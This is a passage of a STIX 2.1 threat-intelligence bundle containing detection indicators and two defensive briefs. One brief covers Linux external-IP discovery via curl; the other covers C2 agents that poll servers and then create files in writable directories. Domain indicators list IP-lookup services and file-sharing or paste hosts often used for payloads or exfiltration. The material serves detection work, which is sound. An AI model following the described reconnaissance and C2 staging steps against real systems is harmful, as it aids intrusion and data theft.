      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--fb503432-278e-5626-b3aa-d95d6735976c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c39ef8b9-30e9-5c2b-8efb-715aa730c5f1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: portmap.io",
      "pattern": "[domain-name:value = 'portmap.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6980f509-e072-51b5-aed2-0fb70c400466",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--c39ef8b9-30e9-5c2b-8efb-715aa730c5f1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--1832e90e-84b3-5e56-8c9c-075bb7cc0a02",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: api.db-ip.com",
      "pattern": "[domain-name:value = 'api.db-ip.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1845dad3-5a94-5eea-a9bb-e5de6be85f75",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--1832e90e-84b3-5e56-8c9c-075bb7cc0a02"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--97747865-fefe-5a09-9d02-f693633c165d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: geolocation-db.com",
      "pattern": "[domain-name:value = 'geolocation-db.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--93fea254-ed85-5c42-9501-545477bf1303",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--97747865-fefe-5a09-9d02-f693633c165d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--08a0733a-7341-59cc-99d5-b9d3e3edc78d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: httpbin.org",
      "pattern": "[domain-name:value = 'httpbin.org']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c910405b-22e2-532b-ba72-54dc7a18b7fb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--08a0733a-7341-59cc-99d5-b9d3e3edc78d"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--24efdf6d-0e79-507b-a15a-aca380a6096e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: myip.opendns.com",
      "pattern": "[domain-name:value = 'myip.opendns.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ca46f393-c0d5-5618-a15d-84c015c157b1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--24efdf6d-0e79-507b-a15a-aca380a6096e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--59e9f0cb-8756-5037-8872-82f02cba1697",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ipv4.icanhazip.com",
      "pattern": "[domain-name:value = 'ipv4.icanhazip.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4d9e58c7-0f4b-5a3a-a7c0-c17ba17ef274",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--59e9f0cb-8756-5037-8872-82f02cba1697"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7b1fca7d-a3cc-5d9b-832e-70f7986593b9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ipv6.icanhazip.com",
      "pattern": "[domain-name:value = 'ipv6.icanhazip.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:15:13Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--341da1c4-4e55-5e9d-9aba-a99028bb4f88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "indicator--7b1fca7d-a3cc-5d9b-832e-70f7986593b9"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--f198ff96-24d2-5e63-a16c-7bd8ef92750c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Network Configuration Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1016",
          "url": "https://attack.mitre.org/techniques/T1016"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e077a582-7b85-5cef-88e2-cb96012d6e06",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "target_ref": "attack-pattern--f198ff96-24d2-5e63-a16c-7bd8ef92750c"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ac1515c3-5151-518b-b4ff-913efad426a4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Linux External IP Address Discovery via Curl",
      "description": "## Overview\n\nThis brief details a common reconnaissance technique employed by malware and threat actors operating on Linux systems: the discovery of a compromised host's external IP address using the `curl` utility. Attackers leverage `curl` to send requests to various public IP lookup services (e.g., ip-api.com, ifconfig.me), which then return the external IP address of the originating request. This action is crucial for attackers to understand their network egress point, configure command and control (C2) channels, or to tailor subsequent attack phases based on the victim's geographical or network location. The detection focuses on identifying `curl` executions where the command line arguments contain known domain patterns for these IP lookup services. This activity, while benign in some legitimate contexts, is frequently observed as a post-exploitation step, making it a valuable indicator of potential malicious activity.\n\n## Attack Chain\n\n1.  **Initial Compromise**: An attacker gains initial access to a Linux system through various means (e.g., exploiting a vulnerability, phishing, weak credentials).\n2.  **Establish Foothold**: The attacker establishes persistence and ensures continued access to the compromised system.\n3.  **Process Execution**: The attacker executes the `curl` utility, often from a suspicious parent process or unusual directory.\n4.  **External IP Lookup**: `curl` is directed to query a known public web service (e.g., `api.ipify.org`, `icanhazip.com`) to retrieve the host's external IP address.\n5.  **Information Gathering**: The output of the `curl` command, containing the external IP, is captured by the attacker.\n6.  **Reconnaissance/C2 Setup**: The obtained external IP address is then used by the attacker for further reconnaissance, establishing a stable command and control (C2) channel, or preparing for subsequent stages of their operation.\n\n## Impact\n\nSuccessful external IP address discovery by an attacker, while not directly damaging, is a critical precursor to more impactful activities. It provides the adversary with essential network context, enabling them to bypass network segmentation, configure firewalls or routing for C2 communications, or identify targets within the same external network space. This can lead to subsequent data exfiltration, deployment of additional malware, or lateral movement within the victim's broader infrastructure, significantly increasing the risk of financial loss, data breach, or operational disruption.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule \"Linux External IP Address Discovery via Curl\" to your SIEM/EDR to detect this specific reconnaissance technique.\n*   Ensure process creation logging is enabled for `curl` on Linux endpoints, as required for the detection rule to function effectively.\n*   Block connections to the listed public IP lookup domains (e.g., `ip-api.com`, `api.ipify.org`, `icanhazip.com`) at the network perimeter where appropriate to limit an attacker's ability to perform this reconnaissance.\n*   Investigate alerts generated by the \"Linux External IP Address Discovery via Curl\" rule, focusing on the parent process and execution path of `curl` for signs of compromise.\n",
      "published": "2026-07-03T15:15:13Z",
      "labels": [
        "discovery",
        "linux",
        "reconnaissance"
      ],
      "object_refs": [
        "indicator--93c78212-6ac4-5e48-b039-146f40fa1be3",
        "indicator--522c50a1-09b9-573e-ae0b-8dc53836e945",
        "indicator--028f87db-68de-567d-bab6-4c69d730e4b9",
        "indicator--12e8c2ad-b4f7-5686-86da-d8f0a31ff70c",
        "indicator--5dfb3465-e0ee-5fb8-8bc8-e0b265412580",
        "indicator--fff93019-f541-5a45-be7b-9f503957a79c",
        "indicator--5b38cbed-4435-5198-a72b-577c38414c48",
        "indicator--4afc0d0a-e8af-52c6-b403-d8929df0b46f",
        "indicator--e5c5b03f-aa41-5d95-9faa-b4edda8a68f5",
        "indicator--b34f2c08-1f5d-5c87-bb21-df85a55c37ba",
        "indicator--a87bb25a-3cb6-5e89-b04e-fd12d68fc932",
        "indicator--13e4934a-ac51-59e5-b095-5dd06783dfb7",
        "indicator--e96a9396-a32e-586e-bfc0-6b4957749fa7",
        "indicator--21d09069-8552-59d1-ab61-c54b25055cee",
        "indicator--7765ba72-a77f-51ef-a051-abf970679868",
        "indicator--23add069-81a7-527e-9e82-01201f4b4c95",
        "indicator--4bfb9dc1-1dd4-5ed9-bf96-54d877adbf12",
        "indicator--949257b7-98c6-5469-8fb0-a3cddbd5afb0",
        "indicator--70271514-9233-5f75-b895-872622020047",
        "indicator--1aafff3d-6dde-5175-b00c-c69ba99bdfe2",
        "indicator--61c1caed-26e0-5e86-b067-ea6c673fb88f",
        "indicator--fc319f09-7c29-5253-9426-f34591018736",
        "indicator--726ab160-0c6e-5d82-bd19-9023ec9755cf",
        "indicator--378d1083-760c-5307-887f-260b223eaa33",
        "indicator--a3a27661-a038-5572-a98b-82edb98143e5",
        "indicator--79958849-0f84-5b2d-bc58-fe25adb4dd00",
        "indicator--9363cc16-5a81-5747-be9d-20b352ef1ef4",
        "indicator--4d1fd378-8072-5745-a4aa-534737497987",
        "indicator--f96052aa-ef3c-5bf6-a458-e718f21ea6f1",
        "indicator--41822fff-c0d7-50b6-96fc-42c7426f49a1",
        "indicator--fb503432-278e-5626-b3aa-d95d6735976c",
        "indicator--c39ef8b9-30e9-5c2b-8efb-715aa730c5f1",
        "indicator--1832e90e-84b3-5e56-8c9c-075bb7cc0a02",
        "indicator--97747865-fefe-5a09-9d02-f693633c165d",
        "indicator--08a0733a-7341-59cc-99d5-b9d3e3edc78d",
        "indicator--24efdf6d-0e79-507b-a15a-aca380a6096e",
        "indicator--59e9f0cb-8756-5037-8872-82f02cba1697",
        "indicator--7b1fca7d-a3cc-5d9b-832e-70f7986593b9",
        "attack-pattern--f198ff96-24d2-5e63-a16c-7bd8ef92750c"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/linux/discovery_curl_external_ip_discovery.toml"
        }
      ],
      "confidence": 40
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8150ab4b-b1f1-5388-b5ca-79b60159b868",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--13971beb-8fbe-5d7e-8d86-2cd013b2dc61",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ec378010-f208-5aa7-93be-bc666bd40232",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--13971beb-8fbe-5d7e-8d86-2cd013b2dc61",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--13971beb-8fbe-5d7e-8d86-2cd013b2dc61",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious Linux C2 Activity: Network Connection Followed by File Creation",
      "description": "## Overview\n\nThis threat brief describes a pattern of suspicious activity on Linux systems consistent with the operation of Command and Control (C2) agents like Poseidon or Athena. These agents often operate from non-standard, writable directories such as `/tmp`, `/dev/shm`, or `/var/log` to evade detection. The observed behavior involves such a process first initiating an outbound network connection, typically polling a C2 framework like Mythic for commands or new payloads. This network communication is then rapidly followed by the creation of a new file by the same process, usually in another suspicious location on the system. This file creation event often indicates the agent receiving and staging further instructions or malicious components. Defenders should recognize this two-stage sequence as a strong indicator of post-compromise activity, potentially leading to data exfiltration, lateral movement, or further system compromise.\n\n## Attack Chain\n\n1.  **C2 Agent Deployment**: An attacker successfully deploys a C2 agent (e.g., Poseidon, Athena) to a non-standard, writable location on a Linux host, such as `/tmp`, `/dev/shm`, `/var/tmp`, `/var/log`, `/var/run/user`, or `/run/user`.\n2.  **Outbound C2 Connection**: The deployed C2 agent initiates an outbound network connection (e.g., HTTP/S web requests) to its C2 server, potentially part of a C2 framework like Mythic, to poll for new commands or payloads.\n3.  **Command Reception**: The C2 server responds to the agent's poll, sending commands, scripts, or additional malicious binaries back to the compromised host.\n4.  **Local File Creation**: The C2 agent creates a new file on the local filesystem, often in a similar suspicious writable directory, to store the received commands, scripts, or payloads.\n5.  **Command Execution**: The C2 agent proceeds to execute the newly created file or the commands received, leading to further actions on objectives such as data collection, privilege escalation, or lateral movement.\n\n## Impact\n\nSuccessful execution of such C2 agent activity can lead to a range of severe consequences. Attackers can maintain persistent access to the compromised Linux system, exfiltrate sensitive data, install additional malware, establish backdoors, or use the system as a launchpad for lateral movement within the network. Since this behavior is characteristic of established C2 frameworks, victims could face significant financial losses, reputational damage, and regulatory penalties depending on the type and sensitivity of compromised data. The lack of specifics in this detection means the full scope of impact can only be assessed upon incident response.\n\n## Recommendation\n\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect suspicious network connections and file creations from writable directories.\n*   Ensure comprehensive `network_connection` and `file_event` logging is enabled on all Linux endpoints to capture the necessary telemetry for these detections.\n*   Implement correlation rules in your SIEM to link network connections from suspicious processes with subsequent file creations by the same process within a short timeframe, mimicking the original EQL rule's logic.\n*   Regularly review processes executing from temporary or shared memory directories (`/tmp`, `/dev/shm`, `/var/tmp`) for anomalous network activity or file system modifications, as detected by the rules above.\n*   Investigate all alerts generated by the `Suspicious Process Network Connection from Writable Path on Linux` rule, especially those involving connections to external or unusual IP addresses.\n*   Analyze processes identified by the `Suspicious File Creation by Process in Writable Path on Linux` rule, focusing on the content of the created files and the parent process responsible.\n",
      "published": "2026-07-03T15:14:07Z",
      "labels": [
        "command-and-control",
        "execution",
        "linux",
        "endpoint-detection"
      ],
      "object_refs": [
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/linux/command_and_control_netcon_file_creation.toml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b338d256-d5c8-5474-8b9f-ec0da2ee5ce1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: githubusercontent.com",
      "pattern": "[domain-name:value = 'githubusercontent.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--062bd1cf-2e80-5139-9bde-bae6b3660d41",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--b338d256-d5c8-5474-8b9f-ec0da2ee5ce1"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d13114ba-a187-5b4c-92e3-89b3555c11ea",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: 0x0.st",
      "pattern": "[domain-name:value = '0x0.st']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a17d1e53-493e-5866-8e17-5d5e0da117e2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--d13114ba-a187-5b4c-92e3-89b3555c11ea"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--26553e1e-928d-5f5c-a091-1d5826ca2b15",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: anonfiles.com",
      "pattern": "[domain-name:value = 'anonfiles.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e1b6f2d8-ebb9-5a87-96d5-2f4c3fb35412",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--26553e1e-928d-5f5c-a091-1d5826ca2b15"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ad1f0b49-c171-5f52-81e0-f978210e2395",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: bashupload.com",
      "pattern": "[domain-name:value = 'bashupload.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--37732032-d510-5adb-b624-2d475eb7e45b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--ad1f0b49-c171-5f52-81e0-f978210e2395"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--90f1bafc-0d17-5320-a51b-76535442d3e7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: cdn.discordapp.com",
      "pattern": "[domain-name:value = 'cdn.discordapp.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d211bd58-a1b4-58bc-8277-54ee316f4236",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--90f1bafc-0d17-5320-a51b-76535442d3e7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--7c644bf5-57aa-51a5-aeca-09a284ae13b7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: chunk.io",
      "pattern": "[domain-name:value = 'chunk.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cc7c2192-9f61-535c-bcf9-5320a30ffa6d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--7c644bf5-57aa-51a5-aeca-09a284ae13b7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e5ea568a-1392-525a-bac6-9a22617ae279",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ddns.net",
      "pattern": "[domain-name:value = 'ddns.net']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--df584a76-1ba1-58cf-8ecb-850c32b3e025",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--e5ea568a-1392-525a-bac6-9a22617ae279"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f606ec5d-d475-5887-ba1c-3406f9be1803",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: dl.dropboxusercontent.com",
      "pattern": "[domain-name:value = 'dl.dropboxusercontent.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9cb8ccce-0548-53c6-adf7-8e38318ff8b1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--f606ec5d-d475-5887-ba1c-3406f9be1803"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4a610c22-aea9-5b6a-ac4a-9668a24439a6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: ghostbin.co",
      "pattern": "[domain-name:value = 'ghostbin.co']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cfe3ffa4-9477-5228-aa99-0f6bc310b5b1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--4a610c22-aea9-5b6a-ac4a-9668a24439a6"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2c24d6a3-4591-5847-bca7-71fdfe534cd5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: github.com",
      "pattern": "[domain-name:value = 'github.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--47c72d6f-f84c-5f1c-a2ad-1804e02b753b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--2c24d6a3-4591-5847-bca7-71fdfe534cd5"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--56df840a-47a2-5267-85e4-a1285f652fe2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: glitch.me",
      "pattern": "[domain-name:value = 'glitch.me']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b129eb7b-db56-5fb0-86c6-288a6b0af97a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--56df840a-47a2-5267-85e4-a1285f652fe2"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--9f2f2917-970e-562a-a168-e9ffe504a06f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: gofile.io",
      "pattern": "[domain-name:value = 'gofile.io']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c1dffa6a-db46-5113-a19a-5df8cbeb2c35",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--9f2f2917-970e-562a-a168-e9ffe504a06f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d3a1185a-897b-506f-87a3-3ab4ee84ae21",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: hastebin.com",
      "pattern": "[domain-name:value = 'hastebin.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6898fd71-31e1-5d6d-8d55-3df7d5408eb4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--d3a1185a-897b-506f-87a3-3ab4ee84ae21"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6e3edb2c-ae5a-5a3d-a687-9da82d59eb18",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: mediafire.com",
      "pattern": "[domain-name:value = 'mediafire.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cce70e87-3b61-5f26-83d3-be5e86f41213",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--6e3edb2c-ae5a-5a3d-a687-9da82d59eb18"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--8dfa6c5a-2b70-54bf-b244-7f7635b4c3fb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: mega.nz",
      "pattern": "[domain-name:value = 'mega.nz']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6d9de632-02bb-58c1-9a20-5ba5c69f8cb4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--8dfa6c5a-2b70-54bf-b244-7f7635b4c3fb"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2b3b47cc-9608-5cdb-9a83-4aeb6fe08bf9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: onrender.com",
      "pattern": "[domain-name:value = 'onrender.com']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0d59d339-538d-5565-a3b1-11340544b1e2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--2b3b47cc-9608-5cdb-9a83-4aeb6fe08bf9"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2e742a9e-0e1f-5fd3-b757-888289fbeda7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: pages.dev",
      "pattern": "[domain-name:value = 'pages.dev']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T15:12:50Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--47056f0c-d76a-52a8-9abd-864427cf7972",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--abf28671-21b1-5400-91b4-f218efca7722",
      "target_ref": "indicator--2e742a9e-0e1f-5fd3-b757-888289fbeda7"
    },
    {
      "type": "indicator",
